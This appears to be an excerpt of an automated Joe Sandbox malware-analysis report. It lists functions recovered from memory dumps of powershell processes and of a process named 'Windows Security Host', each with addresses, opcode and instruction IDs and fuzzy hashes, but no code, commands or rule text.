                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000018.00000002.1466440817.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_24_2_7ffaac580000_powershell.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: b8b18b43abfd6365cc003753692ab41718e778f30cd911d2dbdc5312dfefc9a7
                                                                                                                                                        • Instruction ID: 08b9be716dc6065e8523628122369323ba66ad204b6e973d8d13d2a3a99fa7bb
                                                                                                                                                        • Opcode Fuzzy Hash: b8b18b43abfd6365cc003753692ab41718e778f30cd911d2dbdc5312dfefc9a7
                                                                                                                                                        • Instruction Fuzzy Hash: 1A31D97191CB888FEB199F5C98065F97FE0FB9A310F04426FE04DD3252CA64A955CBC2
                                                                                                                                                        Function 00007FFAAC58A49C Relevance: .1, Instructions: 127COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000018.00000002.1466440817.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_24_2_7ffaac580000_powershell.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 8173cad760b279204184895055e661f0ba7f3f0c4e6cdad3097158c14191672e
                                                                                                                                                        • Instruction ID: 7e6ab571ed370e5fb26299e9a8068ed6eca4ba3876b388a1297cc3c96c8d52b0
                                                                                                                                                        • Opcode Fuzzy Hash: 8173cad760b279204184895055e661f0ba7f3f0c4e6cdad3097158c14191672e
                                                                                                                                                        • Instruction Fuzzy Hash: 49310B7190C74C8FEB19DB6C984A6F9BBE0EB96331F04816FD049C3152D675A41ACB91
                                                                                                                                                        Function 00007FFAAC46EF00 Relevance: .1, Instructions: 126COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000018.00000002.1465732555.00007FFAAC46D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC46D000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_24_2_7ffaac46d000_powershell.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: a386b83787c9b079ca9242d2b5e972435bd9825b4985eca58deef659a2dd119e
                                                                                                                                                        • Instruction ID: 2cb8163cad6e64d99cafdfaeefd435988cd7771652aa232a6388d290987c1299
                                                                                                                                                        • Opcode Fuzzy Hash: a386b83787c9b079ca9242d2b5e972435bd9825b4985eca58deef659a2dd119e
                                                                                                                                                        • Instruction Fuzzy Hash: 7041367140EBC49FE75A8B289855A527FF0EF53324B1901DFE088CB1A7D625E84AC7D2
                                                                                                                                                        Function 00007FFAAC5833B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000018.00000002.1466440817.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_24_2_7ffaac580000_powershell.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                        • Instruction ID: 31d55e4f8b66ca5e5f16fd8237a1d02646902d463fb5189d0446cab783842ff9
                                                                                                                                                        • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                        • Instruction Fuzzy Hash: CC01677115CB0D8FD744EF0CE451AB5B7E0FB99364F10056DE58AC3661DA36E882CB45
                                                                                                                                                        Function 00007FFAAC65414D Relevance: .0, Instructions: 37COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000018.00000002.1467016932.00007FFAAC650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC650000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_24_2_7ffaac650000_powershell.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 8185c56eb8f7f41bd73165e44ff9ffedce15dcb71dd29d3c45ff100103b50b9f
                                                                                                                                                        • Instruction ID: 2ca1db2c0e74a8470fb3e7df0fd8a4e638b4b6d6f4893bbaf095897d4a93ba29
                                                                                                                                                        • Opcode Fuzzy Hash: 8185c56eb8f7f41bd73165e44ff9ffedce15dcb71dd29d3c45ff100103b50b9f
                                                                                                                                                        • Instruction Fuzzy Hash: B9F09A32A4D5488FE669EB5CE4418A877E0EF56320B2150FAE15DC75A3CE25EC44CB80
                                                                                                                                                        Function 00007FFAAC654400 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000018.00000002.1467016932.00007FFAAC650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC650000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_24_2_7ffaac650000_powershell.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: e9aef2bda9570ca32e3c4df9baf452a400e13f2d677a0ad9f76134504e02a974
                                                                                                                                                        • Instruction ID: acd2f5b5ca783ce7cf95017a9c4a407848b5cc979d3914ecc7677780079037ff
                                                                                                                                                        • Opcode Fuzzy Hash: e9aef2bda9570ca32e3c4df9baf452a400e13f2d677a0ad9f76134504e02a974
                                                                                                                                                        • Instruction Fuzzy Hash: 49F0E232A8D5488FE759EB1CE4418A877E0FF06320B5150FAE14DCB463CE25EC44C780
                                                                                                                                                        Function 00007FFAAC6541D1 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000018.00000002.1467016932.00007FFAAC650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC650000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_24_2_7ffaac650000_powershell.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                                                                        • Instruction ID: 73551cc810c09e82e539eb5e1c4e7a3fbd698574b07bad01e3e611af36010216
                                                                                                                                                        • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                                                                        • Instruction Fuzzy Hash: DBE01A31B4C808CFEA79DB0CE0409B973E1EB99321B2161BBD14EC7561CA22EC559BC0

                                                                                                                                                        Non-executed Functions

                                                                                                                                                        Function 00007FFAAC5889F2 Relevance: 7.7, Strings: 6, Instructions: 224COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000018.00000002.1466440817.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_24_2_7ffaac580000_powershell.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: N_^$N_^$N_^$N_^$N_^$N_^)
                                                                                                                                                        • API String ID: 0-3377600668
                                                                                                                                                        • Opcode ID: 26a3d85fdac633b49c26827efb34ec9ae7378e4b367ddb06c5ce1475e4b2d157
                                                                                                                                                        • Instruction ID: 31991e612b43ff0b9bf69f447888da92cc43bac2b42c753251ae2fad674899a2
                                                                                                                                                        • Opcode Fuzzy Hash: 26a3d85fdac633b49c26827efb34ec9ae7378e4b367ddb06c5ce1475e4b2d157
                                                                                                                                                        • Instruction Fuzzy Hash: 7961B4A394E7838FF31A57689C760B56FD4EF52314B0981F6E09DCB093ED18A90A5382

                                                                                                                                                        Executed Functions

                                                                                                                                                        Function 00007FFAAC58644D Relevance: .7, Instructions: 733COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001C.00000002.1617472598.00007FFAAC585000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC585000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_28_2_7ffaac585000_powershell.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 64ca708efa7d9bc537c4fc04b98d13efe469725369ae1df5d6ffb1c1c9c18629
                                                                                                                                                        • Instruction ID: ffa2346ad7acf48fb7d438eb7bb882d026ba2969f0868ed9007a8e743ff29f7e
                                                                                                                                                        • Opcode Fuzzy Hash: 64ca708efa7d9bc537c4fc04b98d13efe469725369ae1df5d6ffb1c1c9c18629
                                                                                                                                                        • Instruction Fuzzy Hash: 5DD15E30A58A4E8FEF84DF58C455AA97BE1FF69300F14816AE40DD7296CE34E885CBC1
                                                                                                                                                        Function 00007FFAAC656605 Relevance: .4, Instructions: 444COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001C.00000002.1620313588.00007FFAAC650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC650000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_28_2_7ffaac650000_powershell.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: c0b48ff5a7b4ba9891b8824b15b99f85a3f01dcca3d128e42403157ae7306e72
                                                                                                                                                        • Instruction ID: f35a38f1e7f79c8ce4c656e00c4c177d5d9ad4cc7d13ab5054284ae4406d6145
                                                                                                                                                        • Opcode Fuzzy Hash: c0b48ff5a7b4ba9891b8824b15b99f85a3f01dcca3d128e42403157ae7306e72
                                                                                                                                                        • Instruction Fuzzy Hash: 5DD1547191EB8E8FF7A6DB2888555B57FA0EF42310B1851BED04DC72D3DA28D809C392
                                                                                                                                                        Function 00007FFAAC58A120 Relevance: .2, Instructions: 221COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001C.00000002.1617472598.00007FFAAC585000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC585000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_28_2_7ffaac585000_powershell.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: c149b598507df31673faa3458e62a523ae9e0318b51916195f62a1199ee59b63
                                                                                                                                                        • Instruction ID: 6a663d277db3869fa264df7b0ded791529ab3879ad0981cd69f4dc98cbb535c9
                                                                                                                                                        • Opcode Fuzzy Hash: c149b598507df31673faa3458e62a523ae9e0318b51916195f62a1199ee59b63
                                                                                                                                                        • Instruction Fuzzy Hash: 95F0E271458A8DCFDB46DF2888190E43FE0EF25211B00419BE40DC7061DBA0D918CBC2
                                                                                                                                                        Function 00007FFAAC58A8CC Relevance: .1, Instructions: 141COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001C.00000002.1617472598.00007FFAAC585000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC585000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_28_2_7ffaac585000_powershell.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: ca17f787f6a7031eb9552c1ab6ff3e16b983d792e93a3f69c6f0c9a4feba067c
                                                                                                                                                        • Instruction ID: 0189ff74b89e2f6e32e3c9445c94be42135fee467b2925d83f4f5827eae5bf46
                                                                                                                                                        • Opcode Fuzzy Hash: ca17f787f6a7031eb9552c1ab6ff3e16b983d792e93a3f69c6f0c9a4feba067c
                                                                                                                                                        • Instruction Fuzzy Hash: 1A31473190EB898FEB15DBA898456F97FE0DB52320F0481BFE04DC7153D964984BCBA1
                                                                                                                                                        Function 00007FFAAC589778 Relevance: .1, Instructions: 119COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001C.00000002.1617472598.00007FFAAC585000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC585000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_28_2_7ffaac585000_powershell.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 578a557b77cb0be7c31a07dbbab263e5d67ead0643cfd87c976e1b755b1a9f7f
                                                                                                                                                        • Instruction ID: 9f7a89cfe880501e9aa8ec92d64264f35c4cd9b778def8fe789dce39ed7e25ca
                                                                                                                                                        • Opcode Fuzzy Hash: 578a557b77cb0be7c31a07dbbab263e5d67ead0643cfd87c976e1b755b1a9f7f
                                                                                                                                                        • Instruction Fuzzy Hash: 0D31907191CB489FDB189B5CA8466A9BBE0FB99311F00822FE44993251CB70A9558BC2
                                                                                                                                                        Function 00007FFAAC46E87F Relevance: .1, Instructions: 54COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001C.00000002.1615933283.00007FFAAC46D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC46D000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_28_2_7ffaac46d000_powershell.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 84e4da84efb7a51fce14da70d86f151c2ca1ddb5975049c754ac93f51fb58f0f
                                                                                                                                                        • Instruction ID: a46ce7e03ff88a071da0977f628ad74d034fc23d8b3fa2cb54a7b3a59b68a0c8
                                                                                                                                                        • Opcode Fuzzy Hash: 84e4da84efb7a51fce14da70d86f151c2ca1ddb5975049c754ac93f51fb58f0f
                                                                                                                                                        • Instruction Fuzzy Hash: 4B014F3150CE088F9AA4EF1EE48595277E0FB98320710069AD41DC765AD731F895CBC5
                                                                                                                                                        Function 00007FFAAC5833B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001C.00000002.1617472598.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_28_2_7ffaac580000_powershell.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                        • Instruction ID: 31d55e4f8b66ca5e5f16fd8237a1d02646902d463fb5189d0446cab783842ff9
                                                                                                                                                        • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                        • Instruction Fuzzy Hash: CC01677115CB0D8FD744EF0CE451AB5B7E0FB99364F10056DE58AC3661DA36E882CB45
                                                                                                                                                        Function 00007FFAAC65414D Relevance: .0, Instructions: 37COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001C.00000002.1620313588.00007FFAAC650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC650000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_28_2_7ffaac650000_powershell.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 8185c56eb8f7f41bd73165e44ff9ffedce15dcb71dd29d3c45ff100103b50b9f
                                                                                                                                                        • Instruction ID: 2ca1db2c0e74a8470fb3e7df0fd8a4e638b4b6d6f4893bbaf095897d4a93ba29
                                                                                                                                                        • Opcode Fuzzy Hash: 8185c56eb8f7f41bd73165e44ff9ffedce15dcb71dd29d3c45ff100103b50b9f
                                                                                                                                                        • Instruction Fuzzy Hash: B9F09A32A4D5488FE669EB5CE4418A877E0EF56320B2150FAE15DC75A3CE25EC44CB80
                                                                                                                                                        Function 00007FFAAC654400 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001C.00000002.1620313588.00007FFAAC650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC650000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_28_2_7ffaac650000_powershell.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: e9aef2bda9570ca32e3c4df9baf452a400e13f2d677a0ad9f76134504e02a974
                                                                                                                                                        • Instruction ID: acd2f5b5ca783ce7cf95017a9c4a407848b5cc979d3914ecc7677780079037ff
                                                                                                                                                        • Opcode Fuzzy Hash: e9aef2bda9570ca32e3c4df9baf452a400e13f2d677a0ad9f76134504e02a974
                                                                                                                                                        • Instruction Fuzzy Hash: 49F0E232A8D5488FE759EB1CE4418A877E0FF06320B5150FAE14DCB463CE25EC44C780
                                                                                                                                                        Function 00007FFAAC6541D1 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001C.00000002.1620313588.00007FFAAC650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC650000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_28_2_7ffaac650000_powershell.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                                                                        • Instruction ID: 73551cc810c09e82e539eb5e1c4e7a3fbd698574b07bad01e3e611af36010216
                                                                                                                                                        • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                                                                        • Instruction Fuzzy Hash: DBE01A31B4C808CFEA79DB0CE0409B973E1EB99321B2161BBD14EC7561CA22EC559BC0

                                                                                                                                                        Non-executed Functions

                                                                                                                                                        Function 00007FFAAC588995 Relevance: 5.2, Strings: 4, Instructions: 150COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001C.00000002.1617472598.00007FFAAC585000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC585000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_28_2_7ffaac585000_powershell.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: N_^$N_^$N_^$N_^
                                                                                                                                                        • API String ID: 0-1196809394
                                                                                                                                                        • Opcode ID: 32080cbdb8c01ae3c3512e3a2fc2bdb393f5bdd9a30229deabd592b9719d7d06
                                                                                                                                                        • Instruction ID: a8b818656b0a0503d88322dc3f79c8bfd9ddf04c35c27e3d9ee2ba833bb8fbcf
                                                                                                                                                        • Opcode Fuzzy Hash: 32080cbdb8c01ae3c3512e3a2fc2bdb393f5bdd9a30229deabd592b9719d7d06
                                                                                                                                                        • Instruction Fuzzy Hash: 0A415F9294F7C38FF35A475848660B56FE4EF53324F0981F6E18C8B0D3E91D994A9392
                                                                                                                                                        Function 00007FFAAC5889FA Relevance: 5.1, Strings: 4, Instructions: 97COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001C.00000002.1617472598.00007FFAAC585000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC585000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_28_2_7ffaac585000_powershell.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: N_^$N_^$N_^$N_^
                                                                                                                                                        • API String ID: 0-1196809394
                                                                                                                                                        • Opcode ID: dfa48eac710f147ebdf91eea26af487558908ace2fd0f8657d0a303cbf2734c8
                                                                                                                                                        • Instruction ID: 7ca30de2bfb1a680445ff34cfea948ed24c9b1131fcd8b9240880e3e52538d32
                                                                                                                                                        • Opcode Fuzzy Hash: dfa48eac710f147ebdf91eea26af487558908ace2fd0f8657d0a303cbf2734c8
                                                                                                                                                        • Instruction Fuzzy Hash: 34316F9294F783CBF75E435888650B02BD4EF62334F0981F6E18D870D3E91DAA0A9392

                                                                                                                                                        Executed Functions

                                                                                                                                                        Function 00007FFAAC591689 Relevance: .7, Instructions: 670COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000022.00000002.1955991572.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_34_2_7ffaac590000_Windows Security Host.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 69eff7dd790c36bfa8ac347cf9769621235c0ff79a2d676a320b1bd29e4d85ce
                                                                                                                                                        • Instruction ID: 9d64a7818d2c18808f3301b4a7a8a2d4a4b611a748789b12ab50feb4b762505c
                                                                                                                                                        • Opcode Fuzzy Hash: 69eff7dd790c36bfa8ac347cf9769621235c0ff79a2d676a320b1bd29e4d85ce
                                                                                                                                                        • Instruction Fuzzy Hash: 04220871F6DA5A4FFB94EB38C4596797BD2FF89340F4445B9E00EC3292DE29A8058381
                                                                                                                                                        Function 00007FFAAC5916C9 Relevance: .6, Instructions: 571COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000022.00000002.1955991572.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_34_2_7ffaac590000_Windows Security Host.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 609eff88c81fbe76f0fc400f1bf01e892165bb9822c479236369c200c893300c
                                                                                                                                                        • Instruction ID: 2f6526031e6445723c60bc7a4c40d9972f6019e6a9405cb4e552763aae8cbda6
                                                                                                                                                        • Opcode Fuzzy Hash: 609eff88c81fbe76f0fc400f1bf01e892165bb9822c479236369c200c893300c
                                                                                                                                                        • Instruction Fuzzy Hash: 6402E661F69A5A4FFB98EB38C45967976D2FF89340F4485B9E00EC32D2DD2DAC058381
                                                                                                                                                        Function 00007FFAAC5911F2 Relevance: .5, Instructions: 545COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000022.00000002.1955991572.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_34_2_7ffaac590000_Windows Security Host.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: f7c5c643205f8a3e33e88648ae7f50d69abd40a30ea10ba9bae853199cfaf181
                                                                                                                                                        • Instruction ID: f25111256e972ebf965faa9782778839804acc8a2d920db87d66b65b512d2a5f
                                                                                                                                                        • Opcode Fuzzy Hash: f7c5c643205f8a3e33e88648ae7f50d69abd40a30ea10ba9bae853199cfaf181
                                                                                                                                                        • Instruction Fuzzy Hash: BB21C362D58A5B8BFB44A3B8D8655FAABF5FF45300F448076E00AD7193DD29A80647C1
                                                                                                                                                        Function 00007FFAAC590C3E Relevance: .2, Instructions: 178COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000022.00000002.1955991572.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_34_2_7ffaac590000_Windows Security Host.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: b7d98476fa6cae4dad3b5f7e47615d99d65a161f474af01bea03b261504bb5b4
                                                                                                                                                        • Instruction ID: dc5a8111b5f92c4c9c11258208a97d7f596b46ee63ee29b068db87d9bddb1ca8
                                                                                                                                                        • Opcode Fuzzy Hash: b7d98476fa6cae4dad3b5f7e47615d99d65a161f474af01bea03b261504bb5b4
                                                                                                                                                        • Instruction Fuzzy Hash: 3A515722A0E7860FE356A778C8265757FE5EF9B210B0944FAE48DC72A3CC1C9C468352
                                                                                                                                                        Function 00007FFAAC590AD1 Relevance: .1, Instructions: 132COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000022.00000002.1955991572.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_34_2_7ffaac590000_Windows Security Host.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 2c43d64b54fc03eb04afb8862ee71af9638a1d45269dc9354b3061161b09bca5
                                                                                                                                                        • Instruction ID: 989a08f3ad854c442310bb2ca4e2250a3ba88337b24c80c9ed47d38e9e714460
                                                                                                                                                        • Opcode Fuzzy Hash: 2c43d64b54fc03eb04afb8862ee71af9638a1d45269dc9354b3061161b09bca5
                                                                                                                                                        • Instruction Fuzzy Hash: 20319392B1DA4A8BF744B7B898597BD77D6EB9D311F0486B6E00DC3292DD2C98428381
                                                                                                                                                        Function 00007FFAAC590985 Relevance: .1, Instructions: 116COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000022.00000002.1955991572.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_34_2_7ffaac590000_Windows Security Host.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 89edfa19e6277a47e63f273b3178a4d515a3c13cf5cb8e47b418174fda6b5e4b
                                                                                                                                                        • Instruction ID: 8627292644537216cf1abf8705b65d53af6c28b158044bd6f07008520ca35e95
                                                                                                                                                        • Opcode Fuzzy Hash: 89edfa19e6277a47e63f273b3178a4d515a3c13cf5cb8e47b418174fda6b5e4b
                                                                                                                                                        • Instruction Fuzzy Hash: 09319571A5860A8FEB44EBB8C8556ED77E1FF99300F508575D00AD7292CE39A8458781
